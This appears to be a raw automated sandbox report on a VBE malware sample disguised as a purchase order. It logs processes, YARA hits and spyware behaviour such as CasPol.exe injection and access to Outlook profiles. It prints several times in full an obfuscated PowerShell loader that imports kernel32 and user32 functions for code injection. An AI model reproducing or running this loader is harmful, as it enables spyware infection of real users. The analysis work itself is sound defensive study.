CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""T
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""T
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4705
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4705
          Source: PO-08784 xlsx.vbe, type: SAMPLEMatched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00C5A648
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00C5EB00
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00C5EB10
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07C6C3E0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07C6D0D0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07C6DA18
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07CB4EA8
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07CB78B0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07CB25A9
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07CB25B8
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07D352C0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07D352B8
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07D30040
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07D30007
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07C64481
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_1D770B8D
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_1F9CE5EA
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_1F9C8B70
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_1F9C7400
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_2037AC70
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_203794D0
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_20374510
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_2037DE10
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_20376688
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_20370B12
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_20451540
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_20454460
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_20452D03
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_204548A0
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_204514D4
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_1D5FB206 NtQuerySystemInformation,
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_1D5FB1D5 NtQuerySystemInformation,
          Source: C:\Windows\System32\wscript.exeSection loaded: edgegdi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: edgegdi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: edgegdi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: security.dll
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-08784 xlsx.vbe"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""T
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.cmdline
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6FA6.tmp" "c:\Users\user\AppData\Local\Temp\3uneeqsg\CSC7012D3CA523F4D77AF1E1BF90852658.TMP"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""T
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.cmdline
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6FA6.tmp" "c:\Users\user\AppData\Local\Temp\3uneeqsg\CSC7012D3CA523F4D77AF1E1BF90852658.TMP"
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_1D5FAAB6 AdjustTokenPrivileges,
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_1D5FAA7F AdjustTokenPrivileges,
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zft31ohr.hmb.ps1Jump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBE@13/10@3/3
          Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ffc00a26ff38e37b47b2c75f92b48929\mscorlib.ni.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4412:120:WilError_03
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4412:304:WilStaging_02
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
          Source: Binary string: $}l8C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.pdb source: powershell.exe, 00000004.00000002.1687266902.0000000004531000.00000004.00000800.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Source: Yara matchFile source: 00000004.00000002.1784183387.00000000093A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000000.1525854532.0000000001100000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu 